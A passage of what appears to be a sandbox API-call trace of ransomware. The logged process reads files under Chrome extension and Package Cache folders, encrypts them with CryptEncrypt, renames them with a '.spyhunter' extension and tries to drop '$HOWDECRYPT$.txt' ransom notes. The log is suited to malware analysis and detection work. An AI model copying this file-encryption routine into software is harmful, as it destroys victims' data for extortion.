hTemplateFile=0x0) returned 0x9c [0160.379] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json") returned 155 [0160.379] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.379] GetProcessHeap () returned 0x2c0000 [0160.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.379] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cea9c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cea9c*=0x147, lpOverlapped=0x0) returned 1 [0160.380] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffeb9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.380] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x147, lpNumberOfBytesWritten=0x25cea9c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cea9c*=0x147, lpOverlapped=0x0) returned 1 [0160.380] GetProcessHeap () returned 0x2c0000 [0160.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.381] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.382] WriteFile (in: hFile=0x9c, lpBuffer=0x25ceadc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cea9c, lpOverlapped=0x0 | out: lpBuffer=0x25ceadc*, lpNumberOfBytesWritten=0x25cea9c*=0x4, lpOverlapped=0x0) returned 1 [0160.382] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cea9c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cea9c*=0x30, lpOverlapped=0x0) returned 1 [0160.382] CloseHandle (hObject=0x9c) returned 1 [0160.382] GetProcessHeap () returned 0x2c0000 [0160.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.382] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.spyhunter") returned 165 [0160.382] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.spyhunter")) returned 1 [0160.383] GetProcessHeap () returned 0x2c0000 [0160.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.383] GetProcessHeap () returned 0x2c0000 [0160.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.383] GetProcessHeap () returned 0x2c0000 [0160.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc7968 | out: hHeap=0x2c0000) returned 1 [0160.384] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cead8 | out: pbBuffer=0x25cead8) returned 1 [0160.384] GetProcessHeap () returned 0x2c0000 [0160.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.384] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cead0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cead0*=0x30) returned 1 [0160.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0160.384] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json") returned 155 [0160.385] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.385] GetProcessHeap () returned 0x2c0000 [0160.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.385] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cea94, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cea94*=0x165, lpOverlapped=0x0) returned 1 [0160.385] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffe9b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.386] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x165, lpNumberOfBytesWritten=0x25cea94, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cea94*=0x165, lpOverlapped=0x0) returned 1 [0160.386] GetProcessHeap () returned 0x2c0000 [0160.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.386] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.386] WriteFile (in: hFile=0x9c, lpBuffer=0x25cead4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cea94, lpOverlapped=0x0 | out: lpBuffer=0x25cead4*, lpNumberOfBytesWritten=0x25cea94*=0x4, lpOverlapped=0x0) returned 1 [0160.386] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cea94, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cea94*=0x30, lpOverlapped=0x0) returned 1 [0160.386] CloseHandle (hObject=0x9c) returned 1 [0160.386] GetProcessHeap () returned 0x2c0000 [0160.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.386] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.spyhunter") returned 165 [0160.386] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.spyhunter")) returned 1 [0160.387] GetProcessHeap () returned 0x2c0000 [0160.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.387] GetProcessHeap () returned 0x2c0000 [0160.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.388] GetProcessHeap () returned 0x2c0000 [0160.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc74d0 | out: hHeap=0x2c0000) returned 1 [0160.388] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cead8 | out: pbBuffer=0x25cead8) returned 1 [0160.388] GetProcessHeap () returned 0x2c0000 [0160.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.388] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cead0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cead0*=0x30) returned 1 [0160.388] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.388] GetProcessHeap () returned 0x2c0000 [0160.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.388] GetProcessHeap () returned 0x2c0000 [0160.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3c4e8 | out: hHeap=0x2c0000) returned 1 [0160.388] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.388] GetProcessHeap () returned 0x2c0000 [0160.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f298b8 | out: hHeap=0x2c0000) returned 1 [0160.388] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.388] GetProcessHeap () returned 0x2c0000 [0160.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4a448 | out: hHeap=0x2c0000) returned 1 [0160.389] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.389] GetProcessHeap () returned 0x2c0000 [0160.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7e58 | out: hHeap=0x2c0000) returned 1 [0160.389] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceac8 | out: pbBuffer=0x25ceac8) returned 1 [0160.389] GetProcessHeap () returned 0x2c0000 [0160.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.389] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceac0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceac0*=0x30) returned 1 [0160.389] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.389] GetProcessHeap () returned 0x2c0000 [0160.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.389] GetProcessHeap () returned 0x2c0000 [0160.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7cf0 | out: hHeap=0x2c0000) returned 1 [0160.389] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceac0 | out: pbBuffer=0x25ceac0) returned 1 [0160.389] GetProcessHeap () returned 0x2c0000 [0160.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.389] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceab8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceab8*=0x30) returned 1 [0160.389] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.390] GetProcessHeap () returned 0x2c0000 [0160.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.390] GetProcessHeap () returned 0x2c0000 [0160.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3bfc8 | out: hHeap=0x2c0000) returned 1 [0160.390] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceac0 | out: pbBuffer=0x25ceac0) returned 1 [0160.390] GetProcessHeap () returned 0x2c0000 [0160.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.390] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceab8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceab8*=0x30) returned 1 [0160.390] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.390] GetProcessHeap () returned 0x2c0000 [0160.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.390] GetProcessHeap () returned 0x2c0000 [0160.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3c3a0 | out: hHeap=0x2c0000) returned 1 [0160.390] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.390] GetProcessHeap () returned 0x2c0000 [0160.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44928 | out: hHeap=0x2c0000) returned 1 [0160.390] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceab8 | out: pbBuffer=0x25ceab8) returned 1 [0160.390] GetProcessHeap () returned 0x2c0000 [0160.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.391] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceab0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceab0*=0x30) returned 1 [0160.391] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.391] GetProcessHeap () returned 0x2c0000 [0160.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.391] GetProcessHeap () returned 0x2c0000 [0160.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44828 | out: hHeap=0x2c0000) returned 1 [0160.391] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceab0 | out: pbBuffer=0x25ceab0) returned 1 [0160.391] GetProcessHeap () returned 0x2c0000 [0160.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.391] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceaa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceaa8*=0x30) returned 1 [0160.391] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.391] GetProcessHeap () returned 0x2c0000 [0160.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.391] GetProcessHeap () returned 0x2c0000 [0160.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8cdd8 | out: hHeap=0x2c0000) returned 1 [0160.391] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.391] GetProcessHeap () returned 0x2c0000 [0160.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f29688 | out: hHeap=0x2c0000) returned 1 [0160.392] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.392] GetProcessHeap () returned 0x2c0000 [0160.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4a1f8 | out: hHeap=0x2c0000) returned 1 [0160.392] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.392] GetProcessHeap () returned 0x2c0000 [0160.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3aa28 | out: hHeap=0x2c0000) returned 1 [0160.392] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceaa0 | out: pbBuffer=0x25ceaa0) returned 1 [0160.392] GetProcessHeap () returned 0x2c0000 [0160.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.392] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea98*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea98*=0x30) returned 1 [0160.392] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.392] GetProcessHeap () returned 0x2c0000 [0160.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.392] GetProcessHeap () returned 0x2c0000 [0160.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3a8b8 | out: hHeap=0x2c0000) returned 1 [0160.393] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceaa0 | out: pbBuffer=0x25ceaa0) returned 1 [0160.393] GetProcessHeap () returned 0x2c0000 [0160.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.393] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea98*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea98*=0x30) returned 1 [0160.393] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.393] GetProcessHeap () returned 0x2c0000 [0160.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.393] GetProcessHeap () returned 0x2c0000 [0160.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3c258 | out: hHeap=0x2c0000) returned 1 [0160.393] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cea98 | out: pbBuffer=0x25cea98) returned 1 [0160.393] GetProcessHeap () returned 0x2c0000 [0160.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.393] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cea90*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cea90*=0x30) returned 1 [0160.393] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.393] GetProcessHeap () returned 0x2c0000 [0160.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.393] GetProcessHeap () returned 0x2c0000 [0160.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8cbf8 | out: hHeap=0x2c0000) returned 1 [0160.394] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.394] GetProcessHeap () returned 0x2c0000 [0160.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f29570 | out: hHeap=0x2c0000) returned 1 [0160.394] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\package 